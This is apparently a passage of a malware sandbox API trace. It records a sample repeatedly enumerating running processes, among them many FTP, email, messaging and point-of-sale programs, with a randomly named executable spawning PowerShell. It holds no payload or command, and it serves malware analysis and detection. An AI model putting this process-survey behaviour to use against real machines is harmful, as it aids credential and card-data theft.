Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.815] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0257.817] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0257.818] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0257.820] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0257.821] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0257.870] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0257.871] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0257.873] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0257.874] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0257.876] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0257.877] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0257.879] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0257.880] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0257.882] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0257.883] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0257.885] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0257.886] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0257.888] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0257.889] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0257.891] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0257.892] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0257.894] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0257.895] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0257.897] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0257.899] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0257.901] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0257.951] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0257.953] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0257.955] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0257.957] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0257.959] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0257.961] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0257.963] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0257.965] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0257.967] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0257.969] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0257.971] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0257.972] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0257.974] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0257.976] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0257.978] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0257.980] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0257.982] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0257.984] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0258.023] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0258.025] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0258.027] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0258.029] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0258.030] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0258.032] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0258.034] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0258.036] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0258.038] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0258.039] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0258.041] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0258.043] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0258.044] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0258.046] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0258.048] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0258.050] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0258.051] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0258.053] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0258.054] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0258.056] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0258.098] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0258.100] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0258.101] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.103] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0258.104] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0258.106] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.108] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0258.110] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0258.112] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0258.113] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0258.115] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.117] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0258.118] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0258.120] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0258.121] CloseHandle (hObject=0x2338) returned 1 [0258.121] Sleep (dwMilliseconds=0x64) [0258.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0258.234] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.236] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0258.237] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0258.239] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, 